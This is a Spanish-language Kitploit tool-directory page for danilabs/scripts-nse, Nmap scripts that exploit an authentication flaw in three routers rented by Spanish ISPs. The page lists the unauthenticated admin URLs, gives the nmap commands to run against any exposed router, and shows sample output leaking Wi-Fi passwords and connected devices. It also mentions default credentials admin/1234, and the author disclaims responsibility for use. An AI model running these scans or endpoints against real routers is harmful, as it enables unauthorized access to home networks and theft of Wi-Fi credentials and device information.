Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
scripts-nse — Algunos scripts NSE para buscar información de routers | Kitploit
Herramientas/GitHubGitHub/danilabs/scripts-nse
ReconocimientoEscáneres de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad WebSeguridad de RedesPruebas de Penetración
GitHubdanilabs/scripts-nse

scripts-nse

Algunos scripts NSE para buscar información de routers

Ver Repositorio
3626hace 10 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

¿Qué es?

Algunos scripts NSE para buscar información de routers.

El autor de estos scripts es VicenDominguez. Él encontró el 0-Day en Huawei; yo solo lo modifiqué para otros dos.

El autor de este script no es responsable de su uso.

#Huawei HG253s v2 Vodafone-España está empezando a alquilar un nuevo router Huawei HG253v2 a los clientes españoles. Este nuevo router viene con una nueva versión de firmware.

##Vulnerabilidad Básicamente, no valida la cookie de sesión en algunas páginas web de administración. Por lo tanto, es posible obtener información directa de esas URLs en cualquier router abierto a Internet.

  • http://IPhtml_253s/api/ntwk/WlanBasic
  • http://IP/html_253s/api/system/diagnose_internet
  • http://IP/html_253s/api/system/hostinfo?type=ethhost
  • http://IP/html_253s/api/system/hostinfo?type=guesthost
  • http://IP/html_253s/api/system/hostinfo?type=homehost
  • http://IP/html_253s/api/system/hostinfo?type=wifihost
  • http://IP/html_253s/api/system/wizardcfg

##Uso

root@kitploit:~
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-vodafone-hua253s: 
|   SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
|   Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX

#Comtrend VG 8050 Telefónica-España está empezando a alquilar un nuevo router Comtrend VG 8050 a los clientes españoles. Este nuevo router viene con una nueva versión de firmware. Este bug ha sido encontrado por DaniLabs

##Vulnerabilidad Básicamente, no valida la cookie de sesión en algunas páginas web de administración. Por lo tanto, es posible obtener información directa de esas URLs en cualquier router abierto a Internet.

  • http://IP/getWifiInfo.jx
  • http://IP/listDevices.jx
  • http://IP/infoApplications.jx

##Uso

root@kitploit:~
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-comtrend-vg-8050: 
|   SSID: MOVISTAR_XXX
|   Cipher Algorithm: WPA
|   Password WEP: 
|   Password WPA: gTU3NkXE44RYjuM2RrxM
|   Password WPA2: 
|   Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

#ADB P.DGA4001N también conocido como HomeStation Telefónica-España está empezando a alquilar un nuevo router ADB P.DGA4001N a los clientes españoles. Este nuevo router viene con una nueva versión de firmware. Este bug ha sido encontrado por DaniLabs

##Vulnerabilidad Básicamente, no valida la cookie de sesión en algunas páginas web de administración. Por lo tanto, es posible obtener información directa de esas URLs en cualquier router abierto a Internet.

  • http://IP/getWifiInfo.jx
  • http://IP/listDevices.jx
  • http://IP/infoApplications.jx

Las credenciales por defecto son admin / 1234 ##Uso

root@kitploit:~
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-homestation: 
|   SSID: WLAN_HOME
|   Cipher Algorithm: WEP
|   Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X

Descargar herramienta